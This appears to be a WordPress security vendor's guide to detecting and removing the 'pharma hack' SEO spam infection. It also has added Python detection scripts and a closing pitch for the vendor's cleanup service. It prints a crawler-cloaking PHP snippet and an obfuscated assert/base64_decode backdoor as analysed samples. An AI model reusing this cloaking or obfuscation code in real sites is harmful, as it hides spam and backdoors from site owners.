Is your WordPress site littered with casino pharma links?
Are your index.php files infected with a malicious spam pharma hack?
Key Takeaways
The pharma hack has evolved a lot in 2024, and so have the steps to fix it.
Recently, a variant known as the “casino pharma hack” has emerged, combining elements of both casino and pharmaceutical spam, further complicating the threat landscape. Understanding these evolving threats is crucial for implementing effective security measures to protect your website’s integrity and maintain its search engine visibility. This black hat SEO exploit destroys victims’ SEO rankings by targeting the Google SERPs; affected sites get blacklisted by Google and start showing the “This Site May Be Hacked” message in search results.
In this article you will learn what the WordPress pharma hack is, and how to find and remove it from a WordPress site by cleaning up the database and the infected files.
The WordPress Pharma Hack, also known as the “Google Viagra Hack,” is a malicious attack targeting WordPress websites. Attackers exploit vulnerabilities to inject spammy content or links promoting pharmaceutical products like Viagra or Cialis into your site’s pages and search engine results. This not only damages your website’s reputation but also adversely affects its search engine rankings. In 2024 we have seen more instances of this kind of hack on WordPress sites than in 2023.
This web exploit is categorised as black hat SEO spam and is mostly targeted at small business websites. Other hacks in the same category include the Gibberish Keywords Hack, Japanese Keywords Spam and the WordPress malware redirect.
Below is a cached version of an infected page, followed by an example of the Google SERP results produced by a pharma hack:
In a recent incident, a WordPress site was compromised by a self-replicating malware that generated spam doorway pages. The malicious file, wp-page.php, was identified and deleted. However, upon reloading the site, the spam content persisted, indicating the file had regenerated. This behavior is characteristic of malware employing cron jobs to reinfect sites. Interestingly, no suspicious cron jobs were found in the user’s crontab.
Further investigation uncovered a malicious nav.php file within the active theme directory. This file was responsible for recreating wp-page.php and injecting its links into legitimate site pages when accessed by search engine crawlers like Googlebot or Bingbot. The nav.php file was included in the theme’s header.php, ensuring its execution with every page load. Removing both nav.php and its reference in header.php effectively eliminated the spam content from the site.
Excerpt from nav.php:

    ...
    // user_min_browser() classifies the visitor by User-Agent; the doorway
    // links are emitted only when it returns 'moved' (i.e. for crawlers)
    $movedb = user_min_browser($_SERVER['HTTP_USER_AGENT']);
    $movedb2 = 'moved';
    if ($movedb == $movedb2) {
        echo '<ul>';
        echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'</a></li>';
        echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'</a></li>';
        ...
        echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'</a></li>';
        echo '</ul>';
    }
Upon discovering the persistent regeneration of the malicious wp-page.php file, a deeper investigation was initiated to identify the underlying cause. It was found that the nav.php file, not originally part of the theme, was being executed through a deliberate inclusion in the header.php file: a single include line for nav.php had been inserted into header.php.
This inclusion ensured that nav.php was executed each time a public page was loaded, facilitating the reinjection of spam content and the recreation of wp-page.php. This method acted as a “delete protection” mechanism, allowing the malware to persist despite removal attempts.
This incident underscores the necessity for comprehensive security measures beyond superficial scans. Website owners must conduct thorough inspections to detect and eliminate hidden threats such as unauthorized file inclusions, backdoors, and other vulnerabilities.
Due to strict regulations, many pharmaceutical products like Viagra, Nexium, and Cialis cannot be promoted through conventional online advertising channels. To circumvent these restrictions, malicious actors exploit high-ranking websites by injecting spammy links and content related to these products. Their goal is to leverage the authority and visibility of compromised sites to promote their offerings illicitly.
Detection Challenges
Detecting the Pharma Hack can be challenging because:
Wondering how to tell if your site is hacked with the pharma hack? This is one of the most important steps in removing pharma hack spam from your WordPress website. Go through the methods below to identify the infection.
You can use free malware scanners for scanning your website. We have also developed our own tool specifically for this purpose.
User-Agent Emulation:
The hack shows its spam only to search engine crawlers, so you need to view your site with a crawler’s User-Agent. We recommend the User-Agent Switcher tool.
For Chrome: https://chrome.google.com/webstore/detail/user-agent-switcher/dbclpoekepcmadpkeaelmhiheolhjflj?hl=en
For Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
Now retrieve one or more pages of your site and look for anything ‘different’ or out of place. If nothing is immediately apparent, view the source of your pages.
Usually this option is available by right-clicking in the page and selecting ‘View source’ from the context menu. If the option isn’t there, try right-clicking on a different (empty) part of the page.
In particular, check the following areas of the page’s source:
– the text between the two tags: look for any words that don’t belong
– the text between the quotes following the content= part of the meta description tag
By now you have either found something or you haven’t.
One final check is to search the HTML source for a select few words that should not ordinarily be found within the page.
You can use the ‘Fetch as Googlebot’ option within Google Webmaster Tools. Check the output code after the page is fetched and rendered.
Google Search Test:
    site:yourdomain.com viagra
or
    inurl:yourdomain.com cialis
or, in a single query:
    site:yourdomain.com (viagra|cialis|regalis|payday|blackjack|holdem|porn)
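As an added example (not from the original article), here is a small Python check that automates the User-Agent test and the search-term test above: it fetches a page once as a browser and once as Googlebot, pulls out the title and meta description, and reports spam terms that appear only in the crawler copy. The fetch helper and the sample pages are constructed for illustration.

```python
"""Cloaking check for a pharma hack: compare what a browser sees with what
Googlebot sees. Added example, not the article's own tooling."""
import re
import urllib.request

# Terms taken from the article's Google search test; extend for your own site.
SPAM_TERMS = ("viagra", "cialis", "regalis", "payday", "blackjack", "holdem", "porn")
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

def spam_hits(html: str, terms=SPAM_TERMS) -> dict:
    """Count each spam term in the HTML (case-insensitive); only present terms are returned."""
    lowered = html.lower()
    return {t: lowered.count(t) for t in terms if t in lowered}

def title_and_description(html: str) -> tuple:
    """Pull the <title> text and the meta description, the two head fields to inspect."""
    title = re.search(r"<title[^>]*>(.*?)</title>", html, re.I | re.S)
    desc = re.search(r'<meta[^>]+name=["\']description["\'][^>]+content=["\']([^"\']*)["\']', html, re.I)
    return (title.group(1).strip() if title else "", desc.group(1).strip() if desc else "")

def cloaked_terms(browser_html: str, crawler_html: str) -> list:
    """Spam terms that occur more often in the crawler copy than in the browser copy.
    That asymmetry is the cloaking signature: humans get a clean page, crawlers get spam."""
    by_browser, by_crawler = spam_hits(browser_html), spam_hits(crawler_html)
    return sorted(t for t, n in by_crawler.items() if n > by_browser.get(t, 0))

def fetch(url: str, user_agent: str, timeout: int = 15) -> str:
    """Fetch url with a chosen User-Agent header (needs network; hypothetical helper)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")

def check_url(url: str) -> dict:
    """Run the full comparison against a live page and return the findings."""
    browser, crawler = fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA)
    return {"browser_head": title_and_description(browser),
            "crawler_head": title_and_description(crawler),
            "cloaked_terms": cloaked_terms(browser, crawler)}

# Constructed sample responses standing in for a real site: the crawler copy
# carries an injected wp-page.php link list, the browser copy does not.
SAMPLE_BROWSER = ('<html><head><title>Acme Bakery</title>'
                  '<meta name="description" content="Fresh bread daily"></head>'
                  '<body><h1>Welcome</h1></body></html>')
SAMPLE_CRAWLER = SAMPLE_BROWSER.replace(
    "</body>",
    '<ul><li><a href="/wp-page.php?t=123">Buy Viagra online</a></li>'
    '<li><a href="/wp-page.php?t=456">Cheap Cialis</a></li></ul></body>')

if __name__ == "__main__":
    print(cloaked_terms(SAMPLE_BROWSER, SAMPLE_CRAWLER))  # ['cialis', 'viagra']
```

Run check_url("https://your-site.example/") against a live page; an empty cloaked_terms list together with a clean title and description is what a healthy site returns.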
In a pharma hack, the backdoors keep regenerating every time you remove them. Regenerating backdoors may be the work of malware that uses cron jobs to reinfect sites, so check the user’s crontab.
If you don’t find any cron job there, the hacker must have injected a backdoor that recreates the infection on the website. To identify the regenerating script, look for a file whose code adds wp-page.php links to legitimate site pages whenever a request is made by Googlebot or Bingbot.
Appending wp-page.php links to legitimate requests isn’t the real problem; the actual problem is the regeneration of the file. For those unfamiliar with how themes work, any include added to the header file is loaded every time the theme is rendered for a visitor, which is how the wp-page.php file keeps coming back.
The hacker injected this line into header.php so that the malicious code executes every time a public website page is requested. This is mainly done to send the spam to search engine crawlers, but it also recreates wp-page.php as a “delete protection” feature.
Basically, the hack consists of two parts: malicious files in the WordPress plugins folder coupled with encoded code in the WordPress database. The files in the plugins folder contain code that runs the encoded code stored in the database. Because of this, the pharma hack is dependent upon these rogue files in the plugins folder.
Typically, hack files contain easily identifiable PHP functions like eval() and base64_decode(), and although the pharma hack is no exception, there’s one major difference. With the pharma hack, these function names are stored in the WordPress database as strings, and they’re written backwards! At runtime, a hack file in the plugins folder pulls these strings from the database, reverses them, and then calls them as functions, and that’s how the deed gets done.
Most of the time, malicious code is disguised to look like legitimate WordPress files and injected into the plugins folder. Any file other than those shipped with your original WordPress plugin install should be looked at closely, since it could be a hack file.
The malicious code queries Google for the list of highest-ranking pages on your website. It then stores this information in its database and targets those pages when it runs.
The pharma hack plants several hard-to-detect WordPress backdoors that let the hacker regain access to your website. If you fix one of the three components (backdoor files, rogue plugin files, database entries) but forget the rest, you’ll most likely be reinfected and the spam will continue to be indexed.
Generally, attackers hunt for vulnerable WordPress installations, i.e. sites running an old version of WordPress, vulnerable plugins and themes, other security loopholes, or hosting multiple websites on the same account, using free WordPress scanners. That is the first step towards injecting backdoors into a compromised site.
When the backdoor is added, it is not immediately executed. Sometimes it stays for months without even getting called. The common places for these backdoors are:
    wp-content/uploads/.*php (random PHP file name)
    wp-includes/images/smilies/icon_smile_old.php.xl
    wp-includes/wp-db-class.php
    wp-includes/images/wp-img.php
In the pharma attack, these files carry the backdoor in the form of the following piece of code:
    <?php
    $XZKsyG='as';
    $RqoaUO='e';
    $ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';                                  // builds the string "assert"
    $joEDdb='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;  // builds the string "base64_decode"
    @$ygDOEJ(@$joEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY... (long string)...
It still ends up calling eval(base64_decode(...)), but it assembles the function names from variables, which makes it hard to detect. In fact, none of the WordPress security plugins are able to find it. Therefore, look for a string like this in your WordPress folders:
    php $[a-zA-Z]*='as';
If you inspect the code, you will see that it scans for the wp-config.php file and reads the database credentials. It therefore acts as a remote shell and retrieves a lot of information about the system. That is the first thing you have to remove before you do anything else.
If you don’t, you may allow hackers to reinfect your site via the backdoor or an unpatched security hole. Reinfection may happen within seconds, or it may take days before the malware returns, causing another stressful situation.
As always, we recommend updating your WordPress instance to the latest version. This goes for all of your plugins, themes, etc. WordPress is typically very secure; it’s when you run old versions and out-of-date plugins/themes that you run into trouble.
For WordPress site owners, there are several reliable free WordPress security plugins that monitor the integrity of core files and theme files. But if you find yourself in a position where you feel attackers are injecting spam into your web pages or SERPs, know that we’re here to help.
The next step of the attack targets compromised plugins and themes, which is why WordPress theme security is so important. After successfully creating a backdoor into the system, the attacker creates a file inside one of the existing plugins. Examples:
    akismet/wp-akismet.php
    akismet/db-akismet.php
    wp-pagenavi/db-pagenavi.php
    wp-pagenavi/class-pagenavi.php
    podpress/ext-podpess.php
    tweetmeme/ext-tweetmeme.php
    excerpt-editor/db-editor.php
    akismet/.akismet.cache.php
    akismet/.akismet.bak.php
    tweetmeme/.tweetmem.old.php
They target one or more old plugins, using names like wp-[plugin].php, db-[plugin].php, ext-[plugin].php, etc.
Look for any plugin file with the wp_class_support string in it:
    $ grep -r "wp_class_support" ./wp-content/plugins
Make sure you remove all those files and, if required, remove the affected plugins altogether. To be 100% sure your plugins are clean, I would recommend removing all of them and reinstalling them (not possible for all sites, but probably the most secure way of doing it). Always keep them updated.
This is the last step, and equally important. This is where the spam itself is hidden. The attackers have been using the wp_options table with these values in option_name:
    class_generic_support
    widget_generic_support
    wp_check_hash
    rss_7988287cd8f4f531c6b94fbdbc4e1caf
    rss_d77ee8bfba87fa91cd91469a5ba5abea
    rss_552afe0001e673901a9f2caebdd3141d
So, run these SQL queries to clean them from your database (adjust the wp_ prefix if your installation uses a different table prefix):
    delete from wp_options where option_name = 'class_generic_support';
    delete from wp_options where option_name = 'widget_generic_support';
    delete from wp_options where option_name = 'fwp';
    delete from wp_options where option_name = 'wp_check_hash';
    delete from wp_options where option_name = 'ftp_credentials';
    delete from wp_options where option_name = 'rss_7988287cd8f4f531c6b94fbdbc4e1caf';
    delete from wp_options where option_name = 'rss_d77ee8bfba87fa91cd91469a5ba5abea';
    delete from wp_options where option_name = 'rss_552afe0001e673901a9f2caebdd3141d';
Go through the steps given below in order to cleanse your site and remove pharma hack spam from your WordPress website.
There are two ways to clean pharma hack files from your WordPress website: manual cleanup, or a security service.
While manually cleaning files, you are making changes to your WordPress files. Unless you are a skilled developer, we’d urge you not to choose manual removal of this hack. But if you have experience handling WordPress files and the database, follow this procedure:
The manual WordPress pharma hack cleanup includes two basic steps: cleaning the plugins folder and cleaning the database.
First, log in to your web host and go to cPanel. There you should find an option for File Manager. Select the File Manager and open the wp-content/plugins folder.
This folder includes the files of all the plugins installed on your WordPress site. The reason we recommend starting with this particular folder is that outdated plugins are the easiest targets for injecting compromised files and thus hacking a website.
Now go back to cPanel. There you should find an option for phpMyAdmin. Open it.
In the database, select the wp_options table. It will allow you to browse through the table content. In the wp_options table, search for the following database entries:
    class_generic_support
    wp_check_hash
    ftp_credentials
    widget_generic_support
    fwp
    rss_% (delete all matches for rss_ except rss_excerpt_length and rss_language)
Before deleting anything, make sure you have taken a full WordPress database backup and know how to export the WordPress database. Then delete all those entries using the SQL queries given above. And that’s it: your site is now free of the hack.
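Added example (not the article’s or any plugin’s code) that turns the indicators from this article into a script: it flags PHP files that assemble function names from pieces (the $x='as'; pattern shown earlier), plain eval(base64_decode( calls, the wp_class_support marker and reversed eval/base64_decode strings, and it triages wp_options rows by the option names listed above and by reversed strings in their values. The sample file contents and rows are constructed.

```python
"""Indicator scan for the pharma hack's two halves: rogue PHP files and rogue
wp_options rows. Added example; sample data is constructed."""
import re

# File-side indicators quoted in the article.
FILE_PATTERNS = {
    "assembled function name ($x='as';)": re.compile(r"\$[A-Za-z]\w*\s*=\s*'as'\s*;"),
    "eval(base64_decode(": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "wp_class_support marker": re.compile(r"\bwp_class_support\b"),
}
# eval / base64_decode / assert spelled backwards, as the hack stores them in the
# database. Word boundaries keep "enclave" or "lavender" from matching "lave".
REVERSED = re.compile(r"\b(lave|edoced_46esab|tressa)\b")

# Database-side indicators: option_name values the article tells you to delete,
# plus its rule "delete all rss_ matches except rss_excerpt_length and rss_language".
BAD_OPTIONS = {"class_generic_support", "widget_generic_support", "wp_check_hash",
               "fwp", "ftp_credentials"}
RSS_ALLOWED = {"rss_excerpt_length", "rss_language"}

def scan_php_source(src: str) -> list:
    """Return the names of every file-side indicator present in one PHP source string."""
    hits = [name for name, pat in FILE_PATTERNS.items() if pat.search(src)]
    if REVERSED.search(src):
        hits.append("reversed function name")
    return hits

def suspicious_option(option_name: str, option_value: str) -> str:
    """Give the reason a wp_options row is suspect, or '' if nothing matched."""
    if option_name in BAD_OPTIONS:
        return "option_name used by the pharma hack"
    if option_name.startswith("rss_") and option_name not in RSS_ALLOWED:
        return "rss_ option outside the allowed list (review before deleting)"
    if REVERSED.search(option_value):
        return "reversed eval/base64_decode in option_value"
    return ""

def triage_options(rows) -> list:
    """Filter (option_name, option_value) pairs down to the suspect ones, with reasons."""
    return [(name, suspicious_option(name, value)) for name, value in rows
            if suspicious_option(name, value)]

# Constructed samples: one backdoor shaped like the article's, one benign plugin
# stub, and a handful of wp_options rows.
SAMPLE_BACKDOOR = ("<?php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';"
                   "@$ygDOEJ(@$joEDdb('ZXZhbChiYXNl...'));")
SAMPLE_CLEAN = "<?php if (!defined('ABSPATH')) exit; add_action('init', 'my_plugin_init');"
SAMPLE_ROWS = [("siteurl", "https://example.com"),
               ("class_generic_support", "O:8:..."),
               ("rss_excerpt_length", "55"),
               ("rss_7988287cd8f4f531c6b94fbdbc4e1caf", "a:1:{...}"),
               ("widget_text", ")(edoced_46esab(lave")]

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_BACKDOOR), triage_options(SAMPLE_ROWS))
```

Feed scan_php_source the contents of each file under wp-content/plugins and triage_options the rows of a SELECT option_name, option_value FROM wp_options export; anything flagged is a candidate for the manual review and SQL cleanup described above.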
If you are unsure how to handle WordPress files, using a security service is ideal. At WP Hacked Help you raise a ticket to get your hacked site cleaned. WP Hacked Help is one of the best WordPress security services on the market and lets you clean your site at the click of a button. So if you find yourself in a position where you feel attackers are injecting spam into your web pages or SERPs, just write to us.
Never skip these post-cleanup steps; they reduce the risk of reinfection and ensure that your website remains clean:
Enable a website firewall. This network security measure places a set of rules on incoming and outgoing traffic in order to protect networks, servers, websites and individual computers. The firewall acts as a wall between a trusted source (say, the server your WordPress website is hosted on) and an untrusted source (the internet), through which only trusted data is allowed.
If you are using WordPress, keep updating it to the latest version. Why? Because out-of-date software is the leading cause of infections. This also includes your plugins, themes, and any other extension type.
It is prudent to change the passwords related to your website: FTP, SFTP, cPanel, Plesk, WP-admin, etc. They could have been compromised, and we do not want you to be reinfected because the attackers can still come back in through them. We recommend that you use a password manager, so you do not have to remember them all.
Also, update the password of your database. Use a strong, unique and hard-to-guess password. Make sure you don’t use your name, your spouse’s name or a date of birth as the password for an integral part of your website. If you’re not familiar with making changes to your database and configuration files, read our article on the subject.
In a lot of cases, we see that websites are compromised due to desktop malware that steals credentials. That’s why we always ask you to take a minute to run an antivirus product.
After the site is clean and secure, a very good practice is to do regular backups. It reduces the chances of damage or risk of data loss to your website. Make sure to go through this WordPress site maintenance checklist to ensure smooth sailing.
For the most part, WordPress has been pretty solid in the security department. Security flaws are almost inevitable, but they’re usually caught early in the development stage. The fact is that when a malicious actor wants to infiltrate your website and he’s good enough at his craft, he’s probably going to succeed.